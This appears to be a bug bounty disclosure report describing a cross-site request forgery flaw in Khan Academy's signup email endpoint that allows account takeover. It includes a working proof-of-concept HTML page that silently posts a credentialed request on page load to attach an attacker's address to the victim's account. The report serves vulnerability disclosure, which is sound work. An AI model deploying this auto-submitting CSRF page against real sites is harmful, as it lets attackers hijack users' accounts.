Cross-Site Request Forgery (CSRF) vulnerability on API endpoint allows account takeovers

## Summary The `/signup/email` API endpoint at [khanacademy.org](https://khanacademy.org) is vulnerable to Cross-Site Request Forgery (CSRF) attacks, allowing takeovers of accounts associated with unconfirmed email addresses. ## Description The vulnerable endpoint allows an authenticated user to change the email address associated with their account if they have not yet confirmed the current address. However, it does not sufficiently verify that requests were intentionally performed by the user (e.g. by checking the values of HTTP headers and using an anti-CSRF token). ## Proof-of-Concept (PoC) This is the code used for the demonstration video attached to this report (ka-signup-email-csrf.mp4). ``` <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <title>Khan Academy Signup Email CSRF PoC</title> <style type="text/css"> body { display:flex; flex-direction:column; justify-content:center; min-height:100vh; margin:0; } p { display:flex; align-self:center; font-size:0.8rem; font-family:sans-serif; font-weight:bold; text-transform:uppercase; letter-spacing:0.1rem; } </style> </head> <body> <p>Khan Academy Signup Email CSRF PoC</p> <script type="text/javascript"> window.addEventListener('load', function(e) { var attacker_addr = '[email protected]'; var x = new XMLHttpRequest(); x.open('POST', 'https://www.khanacademy.org/signup/email', true); x.withCredentials = true; x.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); x.send('email=' + encodeURIComponent(attacker_addr)); }, false); </script> </body> </html> ``` ## Impact An attacker can exploit this vulnerability in order to take over accounts by associating them with an address controlled by the attacker, then performing a password reset. In order for the attack to be successful, the target user account must be associated with an unconfirmed email address, and the target user must visit an attacker-controlled website while logged in.